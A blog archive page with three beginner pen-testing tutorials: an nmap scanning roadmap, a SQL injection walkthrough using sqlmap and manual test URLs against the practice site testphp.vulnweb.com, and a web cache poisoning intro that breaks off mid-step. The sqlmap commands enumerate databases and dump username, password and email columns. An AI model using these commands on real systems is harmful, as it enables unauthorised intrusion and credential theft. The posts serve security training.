Posts

Showing posts from March, 2023

NMAP - Commands | Shahul Hameed

Image
Scanning Methodology — A Roadmap This guide gives you a quick end-to-end roadmap of pen-test activity using nmap. To  Whom It Concern:  This article is for beginners in the cybersecurity domain who wants to get a quick practical guide on Pen Testing systems via the nmap. First thing first, you will need a Network exploration tool and security/port scanner. We will be using the  nmap tool . If you don’t have Nmap installed, you can  get it from here . It’s free…! We can use both Graphical version or via terminal. Methodology Look for Live Systems Check for Open Ports Banner Grabbing Vulnerability Scan Penetration Test Report 1. Check for Live Systems We have to search for any alive systems present in our scope environment. We will perform a sweep over a network. nmap -sP 192.168.205.1/24 Now, we have a total of 6 hosts that are Up out of 256 IP address sweep. 2. Check for Open Ports The next task to be done would be to do a port scanning to obtain information about open ports running on

SQL Injection - Using Tool | Shahul Hameed

 Scope:vulnweb.com Google Dorks site:www.google.com php?id= Automation Exploitation: SQLMAP Tool: Kali > sqlmap -u testphp.vulnweb.com/artist.php?artist=1 --dbs > Question:n or Y > Question:n or Y >  Find database table: sqlmap -u testphp.vulnweb.com/artist.php?artist=1 -D acuart --tables > Find columns name: sqlmap -u testphp.vulnweb.com/artist.php?artist=1 -D acuart -T users --columns Dumping column name informations: sqlmap -u testphp.vulnweb.com/artist.php?artist=1 -D acuart -T users -C uname --dump Result : test sqlmap -u testphp.vulnweb.com/artist.php?artist=1 -D acuart -T users -C pass --dump Result : test sqlmap -u testphp.vulnweb.com/artist.php?artist=1 -D acuart -T users -C email --dump Result : test@email.com Manual Exploitation: Try TestCases: -1,1',-1' https://www.testphp.vulnweb.com/artist.php?artist=1 https://www.testphp.vulnweb.com/artist.php?artist=-1 https://www.testphp.vulnweb.com/artist.php?artist=1'  https://www.testphp.vulnweb.com/artist

Web Cache Poisoning | Shahul Hameed

Image
What is Web Cache Poisoning Web cache poisoning is a type of web security vulnerability in which an attacker manipulates the contents of a web cache to serve malicious content to unsuspecting users. This is achieved by injecting specially crafted HTTP requests into the web application or server, causing the cache to store the attacker's malicious content. When users subsequently access that content, they may unknowingly be served the attacker's malicious version, potentially leading to a range of security issues.  PRE - Requirement:  Param Miner extension in burp suite. Scope Vulnerability: https://34d8a6c9.poison.digi.ninja:2443/basic.php Step 1: Install Extension on burp suite (Already, I am installed on my Burpsuite) Step 2: Intercept the application request and forward it to the repeater for exploiting purposes and finding the unkeyed inputs which vulnerable to web cache poison. Send the requests multiple times and check the extension to find the vulnerable headers or par